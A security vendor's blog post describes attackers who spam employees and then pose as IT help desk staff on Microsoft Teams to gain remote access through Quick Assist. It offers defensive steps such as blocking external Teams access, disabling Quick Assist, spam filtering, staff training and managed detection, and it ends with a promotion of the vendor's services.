Threat Actors Are Impersonating IT Teams to Deploy Ransomware
Threat actors historically rely on exploiting their victims’ trust for financial gain. No one is handing the keys to their house to a stranger. But if the stranger says they smell smoke and they’re dressed as a firefighter? One could be fooled.
Social engineering attempts exploit a person’s trust in brands or people they know well, either through spoofed domains or account compromise, while creating a false sense of urgency — your CEO needs you to buy those gift cards now!
If an employee receives a large volume of spam emails at work, and the IT help desk reaches out through Microsoft Teams to resolve the issue, that’s not the same thing, is it?
The call is coming from inside the house
Coalition Incident Response (CIR) has seen a notable trend in which cyber criminals impersonate the help desk through Microsoft Teams to gain remote access to a business’ network and deploy ransomware.
Threat actors are leveraging default settings in Microsoft 365 to their advantage, but organizations can implement several security measures to reduce their risk.
How the attacks work
In an effort to set off alarm bells for their target, a threat actor inundates the victim’s inbox with a large volume of spam email messages in a short period of time. Then, they contact the victim through Teams and impersonate an IT support provider, flagging the sudden influx of spam as the reason for the call. To “resolve the issue,” all the employee needs to do is grant remote access — often through the Microsoft Quick Assist feature.
Once a threat actor gains access to the employee’s device, they execute PowerShell commands and download malicious ZIP files to maintain access to the system when the call ends. This creates a back door that allows a threat actor to return to the network without encountering any additional security protocols.
By default, Microsoft 365 permits calls and chats from external domains. A threat actor can contact employees under the guise of “IT support” through Teams unless businesses restrict access to outside organizations.
Fortunately, CIR has not seen any of these cases escalate to full-on ransomware attacks. Endpoint monitoring effectively caught the execution of malicious files, notifying impacted organizations of the breach.
But how does a threat actor access an organization’s in-house Microsoft Teams?
By default, Microsoft 365 permits calls and chats from external domains. A threat actor can contact employees under the guise of “IT support” through Teams unless businesses restrict access to outside organizations.
How to block IT impersonation attempts
1. Update Microsoft 365 settings
If your business uses Microsoft 365, it should restrict Teams calls and messages from outside organizations. In the Teams admin center, you can block all external domains in your External access settings (under Users).
To reduce the risk of threat actors gaining remote access, your business should also turn off Quick Assist in Microsoft 365, which gives threat actors a straightforward avenue to social engineering. Instead, opt for a more secure remote access solution that provides additional layers of protection.
2. Turn on spam filters
Don’t let threat actors create a false sense of urgency. Without an inundation of spam emails, your employees may be more suspicious of random outreach from the help desk. Plus, by enabling spam filters, your organization can expect an overall reduction in phishing attempts in the first place.
Many email services include built-in spam filtering tools that recognize keywords commonly used in phishing attempts and block messages from senders that have a history of harmful emails.
3. Educate employees
Does your business have a standard procedure in place when it comes to interacting with IT, whether outsourced or in-house? If your employee receives an unexpected call from the help desk, they should be able to turn to a reliable place or person to confirm the information before they agree to grant remote access.
Encouraging a security-first culture emboldens your team to flag concerning or alarming situations, no matter how small. Security awareness training can be a helpful step in equipping your employees with the knowledge and skills to identify and mitigate potential threats as they come.
4. Implement managed detection and response (MDR)
Endpoint monitoring helps provide an additional layer of security in the event that an employee falls for a social engineering attempt.
If ransomware actors have successfully accessed your network and are looking to deploy malware, 24/7/365 monitoring of your organization’s endpoints is a good way to make sure threat actors don’t make significant headway. If your organization doesn’t have the time or resources to monitor alerts independently, MDR provides human expertise without the additional headcount.
You don't need to fight cybercrime on your own
Threat actors are constantly finding new ways to exploit your trust for their own personal gain. Don’t wait for the right phishing email to land in an employee’s inbox — get protected now.
Coalition offers tools and services to help small businesses spot, prevent, and respond to fast-moving cyber risk. To learn more about Coalition Security™, visit coalitioninc.com/security or click here to book a consultation with our team.
